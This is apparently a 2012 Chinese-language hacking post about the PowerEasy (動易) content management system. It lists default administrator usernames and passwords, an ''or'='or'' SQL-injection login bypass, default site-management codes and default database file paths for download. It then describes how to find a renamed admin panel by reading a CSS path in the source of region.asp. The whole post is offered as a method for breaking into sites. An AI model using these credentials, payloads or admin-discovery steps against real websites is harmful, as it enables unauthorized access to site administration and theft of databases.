動易的預設資料庫、使用者和密碼、認證碼大全還有找後臺方法

fengling132發表於2012-06-17
admin
admin888
'or'='or'
8888
2007
2008
2006
SiteManageCode8888/SiteManageCode
database/SiteWeaver6.5.mdb
database/SiteWeaver.mdb
PowerEasy2006
PowerEasy2007
PowerEasy2008
database/PowerEasy2006.mdb
database/PowerEasy2007.mdb
database/PowerEasy2008.mdb
找後臺方法:


    這個方法很巧,但也不是全部都行,因為有些的已經修改admin_login.asp的名稱,針對修改路徑是很有效的,也可以說是利用了管理員對css的疏忽 
  漏洞檔案: 
  region.asp 
  1、開啟某動易核心的網站,在域名後加region.asp訪問,如http://www.80lr.com/region.asp 
  便會顯示下面的內容: 
  國家/地區: 
  省/市/自治區: 
  市/縣/區/旗: 
  2、然後檢視“原始檔”,在第四行有一段嵌入css的程式碼 
   
  可以看到路徑是:"www.80lr.com/Admin/Admin_Style.css",便得知後臺路徑為“Admin/”,即“Admin_Style.css”前面的資料夾路徑為後臺路徑 
  原因: 
  呼叫的CSS檔案存放在後臺目錄下,導致利用原始碼的查詢而獲取物理路徑. 
本文來自易寒網路,轉載務必註明原文連結:http://www.80lr.com/oday/229.html


相關文章